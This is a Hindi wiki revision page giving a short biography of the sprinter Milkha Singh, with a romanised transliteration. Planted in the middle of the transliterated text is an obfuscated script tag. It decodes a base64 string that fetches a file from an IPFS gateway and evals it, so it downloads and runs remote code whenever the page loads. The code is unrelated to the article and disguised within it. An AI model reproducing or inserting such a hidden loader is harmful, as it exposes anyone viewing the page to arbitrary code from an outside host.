Difference between revisions of "मिलखा सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Milkhasingh-01.jpg|thumb|मिलखा सिंह<br />Milkha Singh]]
 
[[चित्र:Milkhasingh-01.jpg|thumb|मिलखा सिंह<br />Milkha Singh]]
 
'''मिलखा सिंह''' का जन्म [[लायलपुर]] मे [[8 अक्तूबर]] [[1935]] को हुआ था। मिलखा सिंह  ने  [[रोम]] के [[1960]] ग्रीष्म ओलंपिक और [[टोक्यो]] के [[1964]] ग्रीष्म ओलंपिक में [[भारत]] का प्रतिनिधित्व किया था। उनको "उड़न सिख" का  उपनाम दिया गया था।
 
'''मिलखा सिंह''' का जन्म [[लायलपुर]] मे [[8 अक्तूबर]] [[1935]] को हुआ था। मिलखा सिंह  ने  [[रोम]] के [[1960]] ग्रीष्म ओलंपिक और [[टोक्यो]] के [[1964]] ग्रीष्म ओलंपिक में [[भारत]] का प्रतिनिधित्व किया था। उनको "उड़न सिख" का  उपनाम दिया गया था।
{{tocright}}
 
 
==जीवन परिचय==
 
==जीवन परिचय==
 
* भारत के विभाजन के संघर्ष में मिलखा सिंह ने अपने माँ बाप खो दिए। [[पाकिस्तान]] में उन पर होने वाली ज़्यादती के कारण उनका लगभग पूरा परिवार खत्म हो गया। अंततः वे शरणार्थी बन के ट्रेन द्वारा पाकिस्तान से भारत आए।
 
* भारत के विभाजन के संघर्ष में मिलखा सिंह ने अपने माँ बाप खो दिए। [[पाकिस्तान]] में उन पर होने वाली ज़्यादती के कारण उनका लगभग पूरा परिवार खत्म हो गया। अंततः वे शरणार्थी बन के ट्रेन द्वारा पाकिस्तान से भारत आए।
 +
{{tocright}}
 
* ऐसे भयानक बचपन के बाद उन्होंने अपने जीवन में कुछ कर गुज़रने की ठानी। एक होनहार धावक के तौर पर ख्याति प्राप्त करने के बाद उन्होंने 200 मी और 400 मी की दौड़े सफलतापूर्वक की, और इस प्रकार भारत के अब तक के सफलतम धावक बने। कुछ समय के लिए वे 400 मी के विश्व कीर्तिमान धारक भी रहे।
 
* ऐसे भयानक बचपन के बाद उन्होंने अपने जीवन में कुछ कर गुज़रने की ठानी। एक होनहार धावक के तौर पर ख्याति प्राप्त करने के बाद उन्होंने 200 मी और 400 मी की दौड़े सफलतापूर्वक की, और इस प्रकार भारत के अब तक के सफलतम धावक बने। कुछ समय के लिए वे 400 मी के विश्व कीर्तिमान धारक भी रहे।
 
* कार्डिफ़, वेल्स, संयुक्त साम्राज्य में 1958 के कॉमनवेल्थ खेलों में स्वर्ण जेतने के बाद सिख होने की वजह से लंबे बालों के साथ पदक स्वीकारने पर पूरा खेल विश्व उन्हें जानने लगा।
 
* कार्डिफ़, वेल्स, संयुक्त साम्राज्य में 1958 के कॉमनवेल्थ खेलों में स्वर्ण जेतने के बाद सिख होने की वजह से लंबे बालों के साथ पदक स्वीकारने पर पूरा खेल विश्व उन्हें जानने लगा।

Revision as of 13:34, 22 August 2010

thumb|milakha sianh
Milkha Singh
milakha sianh ka janm layalapur me 8 aktoobar 1935 ko hua tha. milakha sianh ne rom ke 1960 grishm olanpik aur tokyo ke 1964 grishm olanpik mean bharat ka pratinidhitv kiya tha. unako "u dan sikh" ka upanam diya gaya tha.

jivan parichay

  • bharat ke vibhajan ke sangharsh mean milakha sianh ne apane maan bap kho die. pakistan mean un par hone vali zyadati ke karan unaka lagabhag poora parivar khatm ho gaya. aantatah ve sharanarthi ban ke tren dvara pakistan se bharat ae.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • aise bhayanak bachapan ke bad unhoanne apane jivan mean kuchh kar guzarane ki thani. ek honahar dhavak ke taur par khyati prapt karane ke bad unhoanne 200 mi aur 400 mi ki dau de saphalatapoorvak ki, aur is prakar bharat ke ab tak ke saphalatam dhavak bane. kuchh samay ke lie ve 400 mi ke vishv kirtiman dharak bhi rahe.
  • kardif, vels, sanyukt samrajy mean 1958 ke k aaumanavelth kheloan mean svarn jetane ke bad sikh hone ki vajah se lanbe baloan ke sath padak svikarane par poora khel vishv unhean janane laga.
  • isi samay par unhean pakistan mean dau dane ka nyauta mila, lekin bachapan ki ghatanaoan ki vajah se ve vahaan jane se hichak rahe the. lekin n jane par rajanaitik uthal puthal ke dar se unhean jane ko kaha gaya. unhoanne dau dane ka nyauta svikar liya.
  • dau d mean milakha sianh ne saralata se apane pratidvandviyoan ko dhvast kar diya, aur asani se jit ge. adhikaanshatah muslim darshak itane prabhavit hue ki poori tarah burkanashin auratoan ne bhi is mahan dhavak ko guzarate dekhane ke lie apane naqab utar lie the, tabhi se unhean flaiang sikh ki upadhi mili.
  • milakha sianh ne bad mean khel se sanyas le liya aur bharat sarakar ke sath khelakood ke protsahan ke lie kam karana shuroo kiya. ab ve chandigadh mean rahate haian.

puraskar


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh